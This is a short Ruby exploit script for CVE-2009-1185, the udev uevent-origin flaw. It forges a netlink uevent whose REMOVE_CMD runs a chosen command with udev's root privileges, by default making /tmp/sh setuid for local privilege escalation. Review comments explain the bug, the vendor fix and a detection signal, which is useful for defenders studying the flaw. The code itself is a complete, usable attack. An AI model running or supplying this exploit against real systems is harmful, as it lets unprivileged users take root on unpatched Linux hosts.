#!/usr/bin/ruby
# exploit for CVE-2009-1185 (udev)
# ruby port of the sploit of r0ux+ph1l+tr0u (cause ruby is superior)
#
# NOTE(review): CVE-2009-1185 is the udev uevent-origin bug: the affected
# udev accepted events on its NETLINK_KOBJECT_UEVENT socket without
# checking that they came from the kernel, so a local process could feed
# it a fabricated event whose rule handling runs with udev's privileges.
# Remediation is the vendor fix for that CVE (patched udev rejects uevents
# that did not originate from the kernel); a host carrying that fix simply
# drops the message below. From a detection standpoint, a userspace
# process opening an AF_NETLINK/NETLINK_KOBJECT_UEVENT socket and sending
# (rather than receiving) on it is the observable signal.
require 'socket'

# Command to embed in the forged event; the default is a setuid chmod.
cmd = ARGV.shift || '/bin/chmod u+s /tmp/sh'

# pid of the udev netlink socket
# Parsed from /proc/net/netlink: the row with protocol 15
# (NETLINK_KOBJECT_UEVENT) and group mask 1. If no row matches, String#[]
# yields nil and nil.to_i is 0, so the connect below silently targets
# netlink pid 0 instead of udev — there is no error reported in that case.
pid = File.read('/proc/net/netlink')[/\s15\s+(\d+)\s+0*1\s/, 1].to_i

s = Socket.new 16, 2, 15 # NETLINK, DGRAM, UDEV
s.connect [16, pid, 0].pack('L*') # NETLINK, pid, group

# exploit /lib/udev/rules.d/95-late.rules
# One NUL-separated uevent: a "remove" action carrying REMOVE_CMD=<cmd>.
# Nothing here confirms delivery or execution; the script exits after send.
s.send "remove@/\0ACTION=remove\0DEVPATH=/\0SUBSYSTEM=/\0TIMEOUT=1\0REMOVE_CMD=#{cmd}\0", 0